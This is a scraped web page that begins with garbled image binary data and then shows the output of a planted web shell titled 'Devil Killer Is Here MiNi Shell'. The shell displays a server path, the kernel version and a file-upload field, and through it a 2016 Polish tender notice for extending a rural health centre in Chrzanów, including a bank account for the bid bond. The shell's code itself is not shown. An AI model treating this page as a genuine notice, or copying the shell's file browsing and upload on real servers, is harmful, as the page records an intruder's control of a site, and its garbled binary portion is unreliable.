JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161020/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161020/327525-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.zla-chrzanow.pl' target='_blank'>www.zla-chrzanow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 327525 - 2016
              z dnia 2016-10-20 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Chrzanów: Rozbudowa istniejącego Wiejskiego Ośrodka Zdrowia ul. Korczaka 2<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zakład Lecznictwa Ambulatoryjnego w Chrzanowie Sp. z o.o., krajowy numer identyfikacyjny
              27621848100000, ul.
              ul. Sokoła 
              19,
              32500  
              Chrzanów, woj.
              małopolskie, państwo
              Polska, tel.
              326 240 325, e-mail
              , faks
              326 240 310.
              <br />
              Adres strony internetowej (URL): www.zla-chrzanow.pl<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.zla-chrzanow.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zla-chrzanow.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zla-chrzanow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br /><br />
                Adres:
                <br />Zakład Lecznictwa Ambulatoryjnego w Chrzanowie Sp. z o.o. 32-500 Chrzanów ul. Sokoła 19</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Rozbudowa istniejącego Wiejskiego Ośrodka Zdrowia ul. Korczaka 2<br /><b>Numer referencyjny: </b>ZLA-ZP-752w/17/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zakres robót: 
a/ roboty rozbiórkowe 
b/ dobudowa szybu windowego o pow.12,43 m2  wraz z przedsionkami na kondygnacjach parteru i piętra , montażem stolarki drzwiowej ( 2 kpl drzwi) i okiennej  oraz robotami wykończeniowymi ,
c/przebudowa schodów zewnętrznych wraz z zadaszeniem ,
d/ dostawa, montaż , uruchomienie dźwigu osobowego wraz z niezbędnymi badaniami i dokumentacją odbiorową     kpl. 1,
e/ dostawa, montaż , uruchomienie  platformy zewnętrznej wraz z niezbędnymi badaniami i dokumentacją odbiorową     kpl. 1,
<br /><br /><b>II.5) Główny kod CPV: </b>45453000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 7<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)	Posiadają niezbędną wiedzę i doświadczenie tzn. w okresie ostatnich 5 lat przed upływem składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia   
       działalności jest krótszy  w tym okresie wykonali minimum dwa  zamówienia 
       polegające na wykonaniu robót budowlanych wraz z dostawą, montażem i 
      uruchomieniem podnośnika dla osób niepełnosprawnych o wartości co najmniej 
     250 000,00 zł netto
b)	Dysponują osobą zdolną do realizacji zamówienia tj. Kierownika budowy- osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  konstrukcyjno  budowlanej bez ograniczeń, oraz wpis na listę członków właściwej Izby Samorządu Zawodowego i będzie pełniła funkcje Kierownika Budowy
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a/ aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
       o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do    
rejestru lub ewidencji, w celu potwierdzenia  braku podstaw do wykluczenia w  
            oparciu o art. 24 ust.5 pkt 1 ustawy  wystawione nie wcześniej niż 6 miesięcy  
             przed upływem terminu składania ofert,
       b/Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza na terytorium  
             Rzeczypospolitej Polskiej, zamiast aktualnego odpisu, o którym mowa wyżej   
             składa  dokument lub dokumenty wystawione w kraju , w którym wykonawca 
             ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie 
             otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej  
              niż 6 miesięcy przed upływem terminu składania ofert,
        c/ Jeżeli w kraju którym Wykonawca ma siedzibę lub miejsce zamieszkania ma 
              osoba ,której dokument dotyczy, nie wydaje się dokumentów, o którym mowa     
              wyżej , zastępuje się je dokumentem zawierającym odpowiednio   
              oświadczenie wykonawcy, ze wskazaniem osoby lub osób uprawnionych  do 
              jego  reprezentacji , lub oświadczenie osoby ,której dokument miał dotyczyć                               
              złożone przed notariuszem lub przed organem sądowym, administracyjnym 
              albo samorządu zawodowego lub gospodarczego właściwym ze względu na 
              siedzibę lub  miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej 
              osoby, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu                                    
              składania ofert.
         d/Wykonawca nie jest zobowiązany do złożenia oświadczeń lub dokumentów ,                        
               o których mowa w ppkt. a-c/, jeżeli Zamawiający posiada oświadczenia lub                    
              dokumenty dotyczące tego Wykonawcy lub może je uzyskać za pomocą 
               bezpłatnych baz danych , w szczególności rejestrów publicznych w 
               rozumieniu ustawy z dnia 17 lutego 2005 r o informatyzacji działalności 
               podmiotów realizujących zadania publiczne(Dz.U. z 2014 r poz.1114 oraz z 
               2016r poz.352).
          e/ W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub 
                dokumentów , o których mowa w ppkt.a-c, w formie elektronicznej pod 
                określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz  
                    danych, Zamawiający pobierze samodzielnie z tych baz danych wskazane 
                    przez Wykonawcę oświadczenia lub dokumenty.
                f/ W przypadku wskazania przez Wykonawcę oświadczeń lub dokumentów o 
                     których mowa w ppkt. a-c ,które znajdują się w posiadaniu Zamawiającego , w 
                     szczególności oświadczeń lub dokumentów przechowywanych przez 
                     Zamawiającego zgodnie z art.97 ust.1 ustawy Pzp, Zamawiający w celu 
                     potwierdzenia okoliczności o których mowa w art.25 ust.1 pkt.1 i 3 ustawy 
                     Pzp, korzysta,  z posiadanych oświadczeń i dokumentów o ile są aktualne.
                g/ na żądanie Zamawiającego ,Wykonawca który polega na zdolnościach lub 
                      sytuacji innych podmiotów na zasadach określonych w art.22a ustawy oraz 
                      wskaże w ofercie wykonanie części zamówienia przez podwykonawcę, 
                      zobowiązany będzie do przedstawienia Zamawiającemu w odniesieniu do 
                      tych podmiotów i podwykonawców ich oświadczeń o niepodleganiu 
                      wykluczeniu z postępowania.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.	Oświadczenie o niepodleganiu wykluczeniu 
2.	Oświadczenie o spełnianiu  warunków udziału w postępowaniu 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">      a/ Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5-  
       ciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,  a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane,  z załączeniem dowodów, określających czy te roboty budowlane zostały wykonane należycie ,w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym  dowodami ,o których mowa są referencje  bądź inne dokumenty wystawione przez podmiot na rzecz którego roboty budowlane były wykonywane, a  jeżeli z uzasadnionej przyczyny o obiektywnym charakterze  wykonawca nie jest w stanie  uzyskać tych dokumentów  inne dokumenty. 
      b/Wykaz osób , skierowanych przez Wykonawcę do realizacji zamówienia 
       publicznego , w szczególności odpowiedzialnych za kierowanie robotami  
       budowlanymi , wraz z informacjami na temat ich kwalifikacji zawodowych , 
       uprawnień , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia 
       a także zakresu  wykonywanych przez nie czynności oraz informacją o podstawie 
       dysponowania tymi osobami.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">      a/ pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie  
      zamówienia publicznego , w przypadku gdy nie wynika ono z wpisu do KRS lub wpisu 
      do CEIDG  należy złożyć wraz z ofertą,
     b/ pełnomocnictwo w przypadku podmiotów występujących wspólnie - należy   
        złożyć wraz z ofertą,
   c/ zobowiązanie podmiotu trzeciego do oddania do dyspozycji wykonawcy    
       niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia    
       zgodnie z art.22a ustawy Pzp  należy złożyć wraz z ofertą,
   d/w celu oceny , czy Wykonawca polegając na zdolnościach lub sytuacji innych   
        podmiotów na zasadach określonych w art.22a ustawy Pzp , będzie dysponował 
        niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia 
        publicznego oraz oceny czy stosunek łączący Wykonawcę z tymi podmiotami 
        gwarantuje rzeczywisty dostęp do ich zasobów , Wykonawca na wezwanie 
        Zamawiającego przedłoży dokumenty ,które będą określały w szczególności:
     1)zakres dostępnych Wykonawcy zasobów innego podmiotu,
     2) sposób wykorzystania zasobów innego podmiotu  przez  Wykonawcę przy    
      wykonywaniu zamówienia publicznego,
      3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia   
       publicznego,
      4)czy podmiot , na zdolnościach którego polega Wykonawca w odniesieniu do   
       warunków udziału w postępowaniu dotyczącym wykształcenia, kwalifikacji  
       zawodowych lub doświadczenia , zrealizuje roboty budowlane lub usługi , których 
        zdolności dotyczą,
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Przystępując do przetargu Wykonawca zobowiązany jest wnieść wadium przetargowe w wysokości: 8 000,00 zł.(słownie: osiem  tysięcy złotych)
Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wniesione w następujących formach:
a/ pieniądzu,
b/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c/ gwarancjach bankowych,
d/ gwarancjach ubezpieczeniowych,
e/ poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U nr 109, poz.1158 z późn. zm.).
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy 
Alior Bank 12 2490 0005 0000 4530 8688 1020  (kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty).
3. W przypadku wnoszenia wadium w formie dokumentów wymienionych w pkt 1 lit. b), c), d) oraz e) - ich oryginał należy złożyć w pokoju nr 41 II piętro , w godzinach pracy , natomiast do oferty należy załączyć kopię potwierdzoną za zgodność z oryginałem.
4. Zamawiający dokona zwrotu wadium Wykonawcy zgodnie z art. 46 ustawy.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
a) Wykonawca w odpowiedzi na wezwanie Zamawiającego, o którym mowa w art.26 ust. 3i 3a ustawy z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia o którym mowa w art.25 ust.1,pełnomocnictwa, lub nie wyrazi zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt.3 ustawy Pzp, co powodowałoby brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej ;

b) Wykonawca, którego oferta została wybrana:
- odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
